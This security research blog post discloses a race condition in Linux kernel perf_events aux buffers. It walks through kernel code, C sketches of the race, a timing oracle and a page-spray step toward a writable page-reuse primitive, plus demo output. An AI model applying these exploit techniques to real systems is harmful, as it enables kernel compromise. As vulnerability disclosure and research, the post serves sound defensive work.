Race conditions in Linux Kernel perf events

Foreword

We disclosed this vulnerability to the kernel security team through responsible disclosure.
The patch on the mailing list is visible here.

We are publishing the vulnerability to demonstrate that it is fully exploitable and to ensure that the technical details are available.

No CVE number has been assigned yet; as per the kernel team's policy, CVEs are only issued once a fix is available and rolled out.
We will retroactively add that information when it becomes available.

The vulnerability seems to have been introduced in the 4.1 kernel, when aux buffers were added to perf events. This makes it roughly 9 years old.
The proof of concept (PoC) in this blog post was only tested on 6.x kernel versions, but should be transferable to older kernel versions as well.

We will demonstrate that the vulnerability is exploitable on a pre-patch vanilla kernel.
However, the exploit strategy described in this blog post does not work on any major distributions.

In particular, as long as check_pages_enabled is true, the exploit strategy laid out in this blog post will not work.
This is the case if init_on_alloc, page poisoning, init_on_free, CONFIG_DEBUG_PAGEALLOC or CONFIG_DEBUG_VM are enabled.

The vulnerability itself does affect major distributions, but we are not publishing a blueprint for how to perform that exploit.

Debian-based distributions, as well as Android and any virtual machines, are not affected.

The rest of this blog post concerns the technical details of the bug and how to exploit it.

What are perf events?

perf_events is a kernel subsystem intended for performance measurement of various aspects of a system.
struct perf_event objects can be created with the perf_event_open syscall. Each type of event is provided by a PMU (performance monitoring unit).

The struct perf_event is returned to the user mode process as a file descriptor.

Each event can have an associated struct perf_buffer ringbuffer, which is called rb on the event struct. This ringbuffer can either be created by mmaping an event that doesn't currently have an rb, or a different event's ringbuffer can be assigned to rb through the PERF_EVENT_IOC_SET_OUTPUT ioctl.
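
To make these interactions concrete, here is a minimal sketch (ours, not taken from the PoC) that opens two events, gives the first one a ring buffer, and forwards the second one to it. The open_event() helper and the PERF_COUNT_SW_DUMMY choice are illustrative; any compatible PMU/config pair works.

#include <linux/perf_event.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

static int open_event(void)
{
    struct perf_event_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = PERF_TYPE_SOFTWARE;     /* an always-available PMU */
    attr.config = PERF_COUNT_SW_DUMMY;
    attr.disabled = 1;

    /* pid = 0, cpu = -1: this process, any CPU */
    return syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
}

int main(void)
{
    int event1 = open_event();
    int event2 = open_event();

    /* mmap event1 once so it gets a perf_buffer: 1 user page + 1 data page */
    mmap(NULL, 2 * 4096, PROT_READ | PROT_WRITE, MAP_SHARED, event1, 0);

    /* point event2 at event1's ring buffer */
    ioctl(event2, PERF_EVENT_IOC_SET_OUTPUT, event1);
    return 0;
}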

perf_buffer struct

The struct perf_buffer data structure is used to keep track of the memory of a buffer as well as multiple counters.
perf_buffer, ring buffer and rb are used interchangeably throughout this writeup.

Source

struct perf_buffer {
    refcount_t            refcount;
    /*[...] Snip for length*/
    int                nr_pages;    /* nr of data pages  */
    /*[...] Snip for length*/
    /* poll crap */
    spinlock_t            event_lock;
    struct list_head        event_list;

    atomic_t            mmap_count;
    unsigned long            mmap_locked;
    struct user_struct        *mmap_user;

    /* AUX area */
    /*[...] Snip for length*/
    unsigned long            aux_pgoff;
    int                aux_nr_pages;
    int                aux_overwrite;
    atomic_t            aux_mmap_count;
    /*[...] Snip for length*/
    refcount_t            aux_refcount;
    int                aux_in_sampling;
    void                **aux_pages;
    void                *aux_priv;

    struct perf_event_mmap_page    *user_page;
    void                *data_pages[];
};

Most of the fields are self explanatory, so we will just give brief additional information on the ones that are relevant for this post.

      • mmap_count keeps track of how many vmas map an event that has this buffer.

      • aux_nr_pages is also used to check if perf_buffer has an aux buffer.

      • aux_mmap_count keeps track of how many vmas map an event that has this aux buffer.

      • user_page points to a special page that the user space can write to, to communicate ring buffer state and configuration.

Creating a ring buffer

To create an rb on an event, the event must be mmaped.
The mmap call then executes perf_mmap, which performs some checks on the arguments and, if those pass, eventually calls rb_alloc.

Specifically, we need pgoff == 0 and the number of pages we are asking for to be one more than a power of two (2^n data pages plus the user page).

It should be noted that the vma is a mapping of the struct perf_event and not of the struct perf_buffer.

The mapped memory starts with the mapping of the user_page and is followed by the data pages.

If an rb already exists, a new struct perf_buffer is not created and rb->mmap_count is incremented instead.
This mmap_count variable keeps track of how many vmas exist that reference this ring buffer; once it reaches zero, a reference on the ring buffer is dropped and it will likely be freed.
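
To make the layout concrete, here is a hedged sketch (again ours, not from the PoC) of creating an rb and peeking at the control fields. struct perf_event_mmap_page is the UAPI type behind user_page, open_event() is the helper from the earlier sketch, and nr_data_pages must be a power of two.

#include <linux/perf_event.h>
#include <stdio.h>
#include <sys/mman.h>

#define PAGE_SZ 4096UL

static void *create_rb(int event_fd, unsigned long nr_data_pages)
{
    /* pgoff == 0, total size == (1 + 2^n) pages */
    size_t sz = (1 + nr_data_pages) * PAGE_SZ;
    void *m = mmap(NULL, sz, PROT_READ | PROT_WRITE, MAP_SHARED, event_fd, 0);

    if (m == MAP_FAILED)
        return NULL;

    /* the first page is the user_page, the data pages follow it */
    struct perf_event_mmap_page *up = m;
    printf("data_offset=%llu data_size=%llu data_head=%llu\n",
           (unsigned long long)up->data_offset,
           (unsigned long long)up->data_size,
           (unsigned long long)up->data_head);
    return m;
}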

Aux buffers

For some PMUs, ring buffers can have an additional auxiliary (aux) buffer. The aux buffer information is embedded in the perf_buffer struct.
The aux fields of the rb are prefixed with aux_ to distinguish them.

To create an aux buffer, its parameters must first be configured through the user_page (namely aux_offset and aux_size); the aux area can then be mmaped with the configured offset and size.

There are additional checks in place to make sure the aux buffer and the original buffer don't overlap.
If all checks pass, the aux buffer values are set up by rb_alloc_aux.
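
A hedged sketch of that flow, assuming event_fd belongs to a PMU that actually supports aux data (e.g. intel_pt) and already has an rb with nr_data_pages data pages whose user page is mapped at up:

#include <linux/perf_event.h>
#include <sys/mman.h>

#define PAGE_SZ 4096UL

static void *map_aux(int event_fd, struct perf_event_mmap_page *up,
                     unsigned long nr_data_pages, unsigned long nr_aux_pages)
{
    /* configure the aux area through the user page: it has to start
     * behind user_page + data pages, and its size is given in bytes */
    up->aux_offset = (1 + nr_data_pages) * PAGE_SZ;
    up->aux_size   = nr_aux_pages * PAGE_SZ;

    /* the mmap request has to match the configured offset and size */
    return mmap(NULL, up->aux_size, PROT_READ | PROT_WRITE,
                MAP_SHARED, event_fd, up->aux_offset);
}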

What can you do with a perf_event and ring buffers?

A perf_event fd has the following interactions with ring buffers.

    • mmap
          • Create a perf_buffer rb if the event doesn't have an rb already and pgoff == 0.

          • Map an existing perf_buffer rb if the event already has an rb and the mmap request matches it.

          • Create an aux buffer for the rb if the user_page has set it up and pgoff matches the configured aux_offset.

          • Map an existing aux buffer, if the rb already has an aux buffer and the mmap request matches it.

    • ioctl
          • Assign another event's perf_buffer to self, if the event's own mmap_count is 0.

event->mmap_mutex

The vma stores a reference to a struct perf_event, which in turn points to a struct perf_buffer, called rb in the code below.
When the vma is closed, the function perf_mmap_close is called.

In it, the code keeps track of what has been closed and adjusts the appropriate counters.
Below is an excerpt of how aux buffers are handled.

          Source

              if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
                  atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
                  /*[...] Snip for length */
          
                  /* this has to be the last one */
                  rb_free_aux(rb);
                  WARN_ON_ONCE(refcount_read(&rb->aux_refcount));
          
                  mutex_unlock(&event->mmap_mutex);
              }
          

rb_has_aux(rb) simply checks if rb->aux_nr_pages != 0.
Then, if vma->vm_pgoff == rb->aux_pgoff, rb->aux_mmap_count is decremented and the event->mmap_mutex lock is taken if the count reached 0.

While the lock is held, some counters are adjusted and eventually rb_free_aux is called, which will free all of the memory associated with the aux buffer.

The issue

The problem is that the lock being taken belongs to the event rather than to the rb.

Since multiple events can point to the same struct perf_buffer, the event->mmap_mutex does not actually prevent concurrent accesses to the rb.

For the rb itself this turns out not to be an issue, because you can only forward an event to a buffer that already exists. But this is not the case for the aux buffer.

What can we do with it?

To get an idea of how we can use this issue to our advantage, let's take a closer look at perf_mmap. We'll walk through the logic with multiple code snippets.

          Source

          static int perf_mmap(struct file *file, struct vm_area_struct *vma)
          {
              struct perf_event *event = file->private_data;
              unsigned long user_locked, user_lock_limit;
              struct user_struct *user = current_user();
              struct perf_buffer *rb = NULL;
              /* [...] Snip for length*/
          
              vma_size = vma->vm_end - vma->vm_start;
          
              if (vma->vm_pgoff == 0) {
                  nr_pages = (vma_size / PAGE_SIZE) - 1;
              } else {
                  /*
                   * AUX area mapping: if rb->aux_nr_pages != 0, it's already
                   * mapped, all subsequent mappings should have the same size
                   * and offset. Must be above the normal perf buffer.
                   */
                  u64 aux_offset, aux_size;
          
                  if (!event->rb)
                      return -EINVAL;
          

If the requested vm_pgoff isn't 0, we assume that it's a request for an aux buffer. We can only create an aux buffer if an rb already exists.

                  nr_pages = vma_size / PAGE_SIZE;
          
                  mutex_lock(&event->mmap_mutex);
                  ret = -EINVAL;
          
                  rb = event->rb;
                  if (!rb)
                      goto aux_unlock;
          

We calculate the number of pages and then take the event->mmap_mutex lock. Afterwards we check whether the event still has an rb and assign it to the local rb variable; this is important for a case distinction later in the code.

                  aux_offset = READ_ONCE(rb->user_page->aux_offset);
                  aux_size = READ_ONCE(rb->user_page->aux_size);
          
                  if (aux_offset < perf_data_size(rb) + PAGE_SIZE)
                      goto aux_unlock;
          

          We get the configured parameters from the user page and we check that the configured offset is actually behind the already existing buffer.

              /*[...] Snipped a bunch of mundane checks on the pg_off and size*/
          
                  if (!atomic_inc_not_zero(&rb->mmap_count))
                      goto aux_unlock;
          
                  if (rb_has_aux(rb)) {
                      atomic_inc(&rb->aux_mmap_count);
                      ret = 0;
                      goto unlock;
                  }
          

          We increment the rb->mmap_count and if there already is an aux buffer we increment rb->aux_mmap_count and return.

                  atomic_set(&rb->aux_mmap_count, 1);
                  user_extra = nr_pages;
          
                  goto accounting;
              }
          

          If there isn’t an aux buffer already we set rb->aux_mmap_count to 1 and jump forward.

              /*[...]Snip rb stuff before accounting label*/
          accounting:
              /*[...]Snip a bunch of rlimit checking to make sure we are allowed to reserve that amount of memory*/
          
              if (!rb) {
              /*[...] Snip rb setup code*/
              } else {
                  ret = rb_alloc_aux(rb, event, vma->vm_pgoff, nr_pages,
                             event->attr.aux_watermark, flags);
                  if (!ret)
                      rb->aux_mmap_locked = extra;
              }
          

This is the case distinction mentioned earlier.
Because the local rb variable is set, we are calling rb_alloc_aux to create an aux buffer.

The rest of the function just increments event->mmap_count and sets up the vma flags and vm_ops.

Because all of this is only protected by the per-event event->mmap_mutex, two events that share the same rb can execute it concurrently.

Getting an “orphaned” aux vma

Our first goal is to get a vma that has the correct size and pgoff to be an aux buffer, while aux_nr_pages is zero.

Note that we can't do the race from within a single process, since the mm's mmap lock is held during mmap.
But we can simply fork into a new process and race from there.
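
A rough sketch of how that cross-process setup could be structured (the pipe-based start signal, parameter names, and helpers are ours, not the PoC's; the mapping side has to go through a second event that was forwarded to the same perf_buffer, as in the oracle setup below):

#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* parent unmaps event1's aux mapping, child simultaneously mmaps the aux
 * region through event2, an event forwarded to the same perf_buffer */
static void race_once(int event2_fd, void *aux_map, size_t aux_size,
                      unsigned long aux_offset)
{
    int start[2];
    pipe(start);

    pid_t pid = fork();
    if (pid == 0) {
        char go;
        read(start[0], &go, 1);                  /* wait for the signal */
        void *m = mmap(NULL, aux_size, PROT_READ, MAP_SHARED,
                       event2_fd, aux_offset);   /* races perf_mmap */
        (void)m;                                 /* fed to the oracle below */
        _exit(0);
    }

    write(start[1], "x", 1);                     /* fire the signal */
    munmap(aux_map, aux_size);                   /* perf_mmap_close -> rb_free_aux */
    waitpid(pid, NULL, 0);
}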

If we mmap an existing aux buffer, it will just increment rb->aux_mmap_count and succeed. The way that perf_mmap checks whether there already is an aux buffer is by checking that aux_nr_pages is not zero.

If we take a quick look at __rb_free_aux, we see that it goes through all pages and frees them, and only sets aux_nr_pages to zero at the very end.

          Source

          static void __rb_free_aux(struct perf_buffer *rb)
          {
              /*[...] Snip for length*/
          
              if (rb->aux_nr_pages) {
                  for (pg = 0; pg < rb->aux_nr_pages; pg++)
                      rb_free_aux_page(rb, pg);
          
                  kfree(rb->aux_pages);
                  rb->aux_nr_pages = 0;
              }
          }
          

Because __rb_free_aux walks and frees every page before clearing the counter, we can make the window in which it is in flight almost arbitrarily large by simply using a large aux buffer.

That means that we can race perf_mmap_close of the aux buffer against perf_mmap.

If perf_mmap_close reduces rb->aux_mmap_count to 0, it will call __rb_free_aux. But perf_mmap doesn't check whether rb->aux_mmap_count is zero; it will happily increment rb->aux_mmap_count again as long as rb->aux_nr_pages is not zero.

If we win the race we will have a vma with an aux buffer pgoff, even though rb->aux_nr_pages has been set to 0.

Race Oracle

With a little bit of trickery we can determine whether we were too early, too late, or whether we won the race.

To do this we need the following setup:

    • event1
          • supports aux

          • already has an rb

          • already has an aux buffer

    • event2
          • does not support aux

          • is forwarded to event1's rb

We will race the mmap of event2 against the munmap of the aux buffer of event1.

If we are too early, event2 increments rb->aux_mmap_count before perf_mmap_close decrements it, so the aux buffer is never freed and our mmap succeeds.
If we are too late, rb->aux_nr_pages was already 0, so event2 will try to create an aux buffer and the mmap will fail with -EOPNOTSUPP, since event2's PMU doesn't support aux.
If we win the race, our mmap succeeds just like in the too-early case, but if we try to access any of the memory in the vma we will get a SIGBUS, since the aux buffer is no longer backed by memory.

So our oracle works like this:
If mmap fails, we were too late.
If mmap succeeds, we wait a little bit to make sure that __rb_free_aux has finished running.
If we then try to access the mapped vma's memory and it succeeds, we were too early.
But if it fails with SIGBUS, we won the race.

Because we have an oracle, we can very reliably find the correct timing for the race condition.
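
The corresponding classification could look roughly like this (a hedged sketch; probe_read(), the enum names, and the 1 ms settle delay are our own choices, not the PoC's):

#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

enum race_result { TOO_LATE, TOO_EARLY, WON };

static sigjmp_buf probe_env;

static void sigbus_handler(int sig)
{
    (void)sig;
    siglongjmp(probe_env, 1);
}

/* returns 0 if the byte is readable, -1 if the access raised SIGBUS */
static int probe_read(volatile const char *p)
{
    struct sigaction sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = sigbus_handler;
    sigaction(SIGBUS, &sa, NULL);

    if (sigsetjmp(probe_env, 1))
        return -1;
    (void)*p;
    return 0;
}

static enum race_result classify(void *aux_mapping)
{
    if (aux_mapping == MAP_FAILED)
        return TOO_LATE;        /* aux_nr_pages was already 0 */
    usleep(1000);               /* let __rb_free_aux finish */
    if (probe_read(aux_mapping) == 0)
        return TOO_EARLY;       /* our reference kept the buffer alive */
    return WON;                 /* vma exists but is no longer backed */
}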

What do we gain from the “orphaned” vma?

Let's first take a quick look at perf_mmap_fault, the fault handler responsible for handling page faults in the perf_event vmas.

                Source

                static vm_fault_t perf_mmap_fault(struct vm_fault *vmf)
                {
                    struct perf_event *event = vmf->vma->vm_file->private_data;
                    struct perf_buffer *rb;
                    vm_fault_t ret = VM_FAULT_SIGBUS;
                
                    /*[...] Snip some code related to write protecting vma pages*/
                
                    vmf->page = perf_mmap_to_page(rb, vmf->pgoff);
                    if (!vmf->page)
                        goto unlock;
                
                    get_page(vmf->page);
                    vmf->page->mapping = vmf->vma->vm_file->f_mapping;
                    vmf->page->index   = vmf->pgoff;
                
                    ret = 0;
                    /*[...]Snip rcu_unlock*/
                    return ret;
                }
                

The page fault handler looks up the page of the buffer that backs the faulting offset and inserts it into the vma. You may have noticed that it doesn't take any locks associated with the rb.

Here is the perf_mmap_to_page function.

                Source

                struct page *
                perf_mmap_to_page(struct perf_buffer *rb, unsigned long pgoff)
                {
                    if (rb->aux_nr_pages) {
                        /* above AUX space */
                        if (pgoff > rb->aux_pgoff + rb->aux_nr_pages)
                            return NULL;
                
                        /* AUX space */
                        if (pgoff >= rb->aux_pgoff) {
                            int aux_pgoff = array_index_nospec(pgoff - rb->aux_pgoff, rb->aux_nr_pages);
                            return virt_to_page(rb->aux_pages[aux_pgoff]);
                        }
                    }
                
                    return __perf_mmap_to_page(rb, pgoff);
                }
                

You can see that as long as rb->aux_nr_pages isn't zero, we can still access the aux buffer pages.
In particular, we can still fault pages into our vma while (or even after) __rb_free_aux returns them to the page allocator.

This wouldn't normally be a problem, since we can't fault in aux buffer pages if we don't have a vma that corresponds to the aux buffer, and the aux buffer should only be freed once rb->aux_mmap_count becomes zero.

But because of our orphaned aux buffer vma, we now have a vma that has the correct pgoff to access the aux buffer but isn't accounted for by rb->aux_mmap_count.

(Well, it technically is accounted for at this stage. But as soon as we create a new aux buffer – which we can do because aux_nr_pages is zero – it will set aux_mmap_count back to 1, making the orphaned vma unaccounted for.)

Stealing pages

By racing against the freeing of the pages, we are able to get several pages mapped into our process that have already been returned to the page allocator. This means we already have a page reuse primitive at this stage. The problem is that we aren't allowed to write to any of the pages in an aux buffer.

But since we are allowed to write to the user page, we can spray struct perf_buffer ring buffers that consist of just one page: the user page.
We already know that this allocation is available to us, since we used it earlier, and it has the same allocation flags as the aux buffer pages, so it is likely that we will receive (at least some of) the same pages that were just returned to the page allocator.
The pages that get returned will be initialized and will have their refcount reset to 1.

The spray is very convenient, because we can simply fill each freshly allocated user page with data and then scan all of the "stolen" pages to work out whether we found a match and which stolen page it corresponds to.
And we can repeat this process as often as needed.
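
A hedged sketch of what that matching could look like (open_event() is the helper from the first sketch; the tag value, the in-page offset past the mmap page header, and the counts are arbitrary placeholders, not the PoC's):

#include <stdint.h>
#include <stdio.h>
#include <sys/mman.h>

#define PAGE_SZ   4096UL
#define TAG_SLOT  256                       /* u64 index well past the header fields */
#define TAG_MAGIC 0x4242424200000000UL

int open_event(void);                       /* helper from the first sketch */

/* spray fresh one-page ring buffers, tag each user page, then look for the
 * tags through the stolen (read-only) aux mapping */
static void spray_and_scan(volatile uint64_t **sprayed, size_t nr_spray,
                           const char *stolen, size_t nr_stolen)
{
    for (size_t i = 0; i < nr_spray; i++) {
        int fd = open_event();
        sprayed[i] = mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE,
                          MAP_SHARED, fd, 0);       /* only the user page */
        if (sprayed[i] == MAP_FAILED)
            continue;
        sprayed[i][TAG_SLOT] = TAG_MAGIC | i;       /* tag it */
    }

    for (size_t p = 0; p < nr_stolen; p++) {
        uint64_t v = ((const uint64_t *)(stolen + p * PAGE_SZ))[TAG_SLOT];
        if ((v & ~0xffffffffUL) == TAG_MAGIC)
            printf("stolen page %zu is the user page of spray slot %lu\n",
                   p, (unsigned long)(v & 0xffffffff));
    }
}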

Once we have found enough pages, we remove them from the readonly orphaned aux buffer mapping and can then unmap the user page in our spray with madvise MADV_DONTNEED.
Using madvise lets us remove the page from the vma mapping without closing the vma.
This will drop the refcount of the page back to zero, because it was reset to 1 when it was allocated for our user page.

                Because the refcount dropped to zero, the page is returned to the page allocator once again – even though we still have a reference to it – but this time it is writable.
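
A hedged sketch of this step (how the PoC drops the read-only alias is an implementation detail we assume here; the MADV_DONTNEED on the sprayed user page is the part described above):

#include <sys/mman.h>

#define PAGE_SZ 4096UL

/* stolen_alias: the page's address inside the read-only orphaned aux vma
 * user_page:    the same physical page, mapped writable via our spray   */
static void pivot_page(void *stolen_alias, void *user_page)
{
    /* drop our read-only view first (assumed; shown with madvise for symmetry) */
    madvise(stolen_alias, PAGE_SZ, MADV_DONTNEED);

    /* zap the sprayed user page without closing its vma; the page's refcount
     * falls back to zero and it returns to the page allocator while we still
     * know where it is */
    madvise(user_page, PAGE_SZ, MADV_DONTNEED);
}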

                At this stage we have a writable page reuse primitive.
                We can now spray kernel objects and if they end up in our page we have full control over them.
                The rest of the exploit is neither interesting nor specific to this vulnerability, so we will stop here.

Why it doesn't work on most distros

On most (or even all) distributions this strategy doesn't work. If check_pages_enabled is true, the page allocator performs several sanity checks on every page it returns, and the pages that we "stole" still have a non-zero refcount.

This is what that looks like:

                Aug 05 11:59:33 archlinux kernel: BUG: Bad page map in process exploit  pte:8000000378b4f025 pmd:3bb7ff067
                Aug 05 11:59:33 archlinux kernel: page: refcount:1 mapcount:-1 mapping:00000000dbe5efca index:0x751 pfn:0x378b4f
                Aug 05 11:59:33 archlinux kernel: aops:anon_aops.0 ino:836 dentry name:"inotify"
                Aug 05 11:59:33 archlinux kernel: flags: 0x2ffff8000000004(referenced|node=0|zone=2|lastcpupid=0x1ffff)
                Aug 05 11:59:33 archlinux kernel: raw: 02ffff8000000004 dead000000000100 dead000000000122 ffff975cc0585d50
                Aug 05 11:59:33 archlinux kernel: raw: 0000000000000751 0000000000000000 00000001fffffffe 0000000000000000
                Aug 05 11:59:33 archlinux kernel: page dumped because: bad pte
                

In that case the page allocator will skip over any pages that don't pass the sanity checks, so the stolen pages will never be returned by the page allocator for any allocation.

It is possible to get around this in a scenario where another process allocates the page in the time window between the page being returned by __rb_free_aux and us stealing it. But in that case the refcount never becomes zero, so we cannot perform the pivot to a writable mapping, which most likely reduces this to a KASLR bypass.

Demo

On a fresh vanilla kernel compiled with a default config, however, these checks are not enabled.

Below you can see the output of our proof of concept.

                / # /mnt/host/exploit
                [+] Opening event fd
                [+] Found aux mappable pmu: t=1, c=2
                [+] Opened event fds
                [+] redirected event2->event1
                [P] Started
                [C] Started
                [C] Won stage 1 race
                [C] Unmap Fault Started
                [P] Unmap Started
                [C] Won stage 2 race
                [C] Caught sigbus, correcting offset
                [P] Starting the spray
                [C] Scanning 2339 pages, range 0x7fcb1d263000-0x7fcb1db86000
                [C] Unmapping readable pages with writable counterpart
                [P] Found 33 writable page(s) in 49 iterations
                [C] Spinning
                [P] Doing refcount manipulation
                [P] Checking for change and spraying
                [P] Writable page changed
                dump@0x7fcb1db46000
                dump: +0000: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
                dump: +0040: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0080: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +00c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
                dump: +0100: 00FFFF42FFFFFFFF00FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0140: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +0180: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
                dump: +01c0: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0200: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +0240: 0000000000000000000000000000000050FFFF42FFFFFFFF50FFFF42FFFFFFFF000000000000000068FFFF42FFFFFFFF68FFFF42FFFFFFFF0000000000000000
                dump: +0280: FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +02c0: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +0300: 0000000000000000000000000000000010FFFF42FFFFFFFF10FFFF42FFFFFFFF000000000000000028FFFF42FFFFFFFF28FFFF42FFFFFFFF0000000000000000
                dump: +0340: 40FFFF42FFFFFFFF40FFFF42FFFFFFFF000000000000000010000000100000001000000001000000010000000200000001000000010000000000000000000000
                dump: +0380: 00000000000000000000000000000000000000000000000000FFFF40FFFFFFFF601305FFFFFFFFFF000000000000000000000000000000000000000000000000
                dump: +03c0: 00000000000000000000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000FFFFFF42FFFFFFFFFFFFFF42FFFFFFFF0000000000000000
                [P] Main thread done
                [P] Spinning
                

Try it yourself

The PoC described in this blog post can be found here.

If you plan to experiment with this bug, it is HIGHLY recommended to patch the kernel so that you can do so in a virtual machine. You will most likely completely freeze the kernel if anything goes wrong with your exploit.
Your virtual machine should have at least 2 CPU cores, so that the racing sides can actually run concurrently.
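
To make the timing more deterministic, it can also help to pin the two racing sides to different cores. A generic sketch (a standard trick, not necessarily what the PoC does):

#define _GNU_SOURCE
#include <sched.h>

/* pin the calling process/thread to a single CPU */
static int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);
}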

Written by Nils Ole Timm, @Firzen14
Linux Team Security Researcher
Binary Gecko GmbH
